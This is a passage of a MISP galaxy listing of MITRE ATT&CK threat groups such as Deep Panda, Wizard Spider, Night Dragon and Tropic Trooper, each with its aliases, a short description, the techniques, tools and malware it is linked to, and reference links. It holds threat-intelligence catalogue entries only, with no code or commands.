uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SpicyOmelette - S0646" with estimative-language:likelihood-probability="almost-certain"

Table 4457. Table References
Links
https://attack.mitre.org/groups/G0080
https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html
https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf
https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf
https://www.group-ib.com/blog/cobalt
https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target
https://www.riskiq.com/blog/labs/cobalt-strike/
https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/
https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain
https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish
https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report
https://blog.morphisec.com/cobalt-gang-2.0

Deep Panda - G0009

[Deep Panda](https://attack.mitre.org/groups/G0009) is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. (Citation: Alperovitch 2014) The intrusion into healthcare company Anthem has been attributed to [Deep Panda](https://attack.mitre.org/groups/G0009). (Citation: ThreatConnect Anthem) This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. (Citation: RSA Shell Crew) [Deep Panda](https://attack.mitre.org/groups/G0009) also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. (Citation: Symantec Black Vine) Some analysts track [Deep Panda](https://attack.mitre.org/groups/G0009) and [APT19](https://attack.mitre.org/groups/G0073) as the same group, but it is unclear from open source information if the groups are the same. (Citation: ICIT China’s Espionage Jul 2016)

The tag is: misp-galaxy:mitre-intrusion-set="Deep Panda - G0009"

Deep Panda - G0009 is also known as:

Deep Panda
Shell Crew
WebMasters
KungFu Kittens
PinkPanther
Black Vine

View relationships graph

Deep Panda - G0009 has relationships with:

similar: misp-galaxy:threat-actor="Shell Crew" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Hurricane Panda" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Codoso" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Ping - S0097" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Sakula - S0074" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Tasklist - S0057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="StreamEx - S0142" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Mivast - S0080" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Derusbi - S0021" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

Table 4458. Table References
Links
https://attack.mitre.org/groups/G0009
https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/
https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/
https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf
https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/

Wizard Spider - G0102

[Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Wizard Spider - G0102"

Wizard Spider - G0102 is also known as:

Wizard Spider
UNC1878
TEMP.MixMaster
Grim Spider

View relationships graph

Wizard Spider - G0102 has relationships with:

uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="TrickBot - S0266" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Emotet - S0367" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Ryuk - S0446" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Dyre - S0024" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing Certificates - T1588.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Nltest - S0359" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Ping - S0097" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="BloodHound - S0521" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="AdFind - S0552" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Conti - S0575" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Bazar - S0534" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="GrimAgent - S0632" with estimative-language:likelihood-probability="almost-certain"

Table 4459. Table References
Links
https://attack.mitre.org/groups/G0102
https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/
https://us-cert.cisa.gov/ncas/alerts/aa20-302a
https://www.crowdstrike.com/blog/wizard-spider-adversary-update/
https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html
https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/

Dust Storm - G0031

[Dust Storm](https://attack.mitre.org/groups/G0031) is a threat group that has targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. (Citation: Cylance Dust Storm)

The tag is: misp-galaxy:mitre-intrusion-set="Dust Storm - G0031"

Dust Storm - G0031 is also known as:

Dust Storm

View relationships graph

Dust Storm - G0031 has relationships with:

similar: misp-galaxy:threat-actor="Dust Storm" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="S-Type - S0085" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Misdat - S0083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ZLib - S0086" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Mis-Type - S0084" with estimative-language:likelihood-probability="almost-certain"

Table 4460. Table References
Links
https://attack.mitre.org/groups/G0031
https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf

Night Dragon - G0014

[Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon)

The tag is: misp-galaxy:mitre-intrusion-set="Night Dragon - G0014"

Night Dragon - G0014 is also known as:

Night Dragon

View relationships graph

Night Dragon - G0014 has relationships with:

similar: misp-galaxy:threat-actor="Night Dragon" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-tool="gsecdump - S0008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="zwShell - S0350" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ASPXSpy - S0073" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="at - S0110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1307" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1330" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote access tool development - T1351" with estimative-language:likelihood-probability="almost-certain"

Table 4461. Table References
Links
https://attack.mitre.org/groups/G0014
https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf

Blue Mockingbird - G0108

[Blue Mockingbird](https://attack.mitre.org/groups/G0108) is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019.(Citation: RedCanary Mockingbird May 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Blue Mockingbird - G0108"

Blue Mockingbird - G0108 is also known as:

Blue Mockingbird

View relationships graph

Blue Mockingbird - G0108 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="COR_PROFILER - T1574.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4462. Table References
Links
https://attack.mitre.org/groups/G0108
https://redcanary.com/blog/blue-mockingbird-cryptominer/

Tropic Trooper - G0081

[Tropic Trooper](https://attack.mitre.org/groups/G0081) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://attack.mitre.org/groups/G0081) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Tropic Trooper - G0081"

Tropic Trooper - G0081 is also known as:

Tropic Trooper
Pirate Panda
KeyBoy

View relationships graph

Tropic Trooper - G0081 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="KeyBoy - S0387" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="YAHOYAH - S0388" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="BITSAdmin - S0190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="USBferry - S0452" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ShadowPad - S0596" with estimative-language:likelihood-probability="almost-certain"

Table 4463. Table References
Links
https://attack.mitre.org/groups/G0081
https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/
https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/
https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf
https://www.crowdstrike.com/blog/on-demand-webcast-crowdstrike-experts-on-covid-19-cybersecurity-challenges-and-recommendations/

Lazarus Group - G0032

